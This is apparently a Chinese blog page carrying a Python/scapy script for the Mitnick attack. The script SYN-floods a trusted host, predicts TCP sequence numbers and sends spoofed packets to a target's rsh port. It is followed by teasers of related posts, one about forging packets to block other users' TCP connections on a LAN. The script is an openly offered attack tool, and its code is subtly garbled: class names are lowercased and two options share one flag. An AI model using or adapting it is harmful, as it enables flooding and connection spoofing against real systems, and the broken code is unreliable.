偽造TCP連線

2021-08-14 18:07:07 字數 2451 閱讀 6147

#!/usr/bin/python


#coding=utf-8


import optparse


from scapy.all import *


def synflood(src, tgt):


# tcp源埠不斷自增一,而目標埠513不變


for sport in range(1024, 65535):


iplayer = ip(src=src, dst=tgt)


tcplayer = tcp(sport=sport, dport=513)


pkt = iplayer / tcplayer


send(pkt)


def caltsn(tgt):


seqnum = 0


prenum = 0


diffseq = 0


# 重複4次操作


for x in range(1,5):


# 若不是第一次傳送syn包,則設定前乙個序列號值為上一次syn/ack包的序列號值


# 邏輯出現問題


# if prenum != 0:


if seqnum != 0:


prenum = seqnum


# 構造並傳送tcp syn包


pkt = ip(dst=tgt) / tcp()


ans = sr1(pkt, verbose=0)


# 讀取syn/ack包的tcp序列號


seqnum = ans.getlayer(tcp).seq


if prenum != 0:


diffseq = seqnum - prenum


print "[*] prenum: %d seqnum: %d" % (prenum, seqnum)


print "[+] tcp seq difference: " + str(diffseq)


print


return seqnum + diffseq


# 偽造tcp連線


def spoofconn(src, tgt, ack):


print '[*] attack tcp connection number : ' + str(ack)


# 傳送tcp syn包


iplayer = ip(src=src, dst=tgt)


tcplayer = tcp(sport=513, dport=514)


synpkt = iplayer / tcplayer


send(synpkt)


# 傳送tcp ack包


iplayer = ip(src=src, dst=tgt)


tcplayer = tcp(sport=513, dport=514, ack=ack)


ackpkt = iplayer / tcplayer


send(ackpkt)


def main():


parser = optparse.optionparser('[*]usage: python mitnickattack.py -s -s -t ')


parser.add_option('-s', dest='synspoof', type='string', help='specifc src for syn flood')


parser.add_option('-s', dest='srcspoof', type='string', help='specify src for spoofed connection')


parser.add_option('-t', dest='tgt', type='string', help='specify target address')


(options, args) = parser.parse_args()


if options.synspoof == none or options.srcspoof == none or options.tgt == none:


print parser.usage


exit(0)


else:


synspoof = options.synspoof


srcspoof = options.srcspoof


tgt = options.tgt


print '[+] starting syn flood to suppress remote server.'


synflood(synspoof, srcspoof)


print '[+] calculating correct tcp sequence number.'


seqnum = caltsn(tgt) + 1


print '[+] spoofing connection.'


spoofconn(srcspoof, tgt, seqnum)


print '[+] done.'


if __name__ == '__main__':


main()

偽造IP包,禁止TCP連線

大家是否想過在區域網內如何禁止別人訪問web server,pop3,ftp等。那麼如何禁止呢?大家都知道tcp是面向連線的,連線時有三次握手,之後才能確認連線成功。那麼我們就應該能在第一次握手之後偽造乙個服務方的握手返回,從而達到tcp連線不成功,無法訪問某埠。程式如下 void decodeip...

偽造IP包,禁止TCP連線

大家是否想過在區域網內如何禁止別人訪問web server,pop3,ftp等。那麼如何禁止呢?大家都知道tcp是面向連線的,連線時有三次握手,之後才能確認連線成功。那麼我們就應該能在第一次握手之後偽造乙個服務方的握手返回,從而達到tcp連線不成功,無法訪問某埠。程式如下 void decodeip...

關閉tcp連線

luolei localhost sudo netstat a grep ssh tcp 0 0 192.168.1.10 40278 com ssh established unix 2 acc stream listening 7565 tmp ssh uyvolk4882 agent.4882...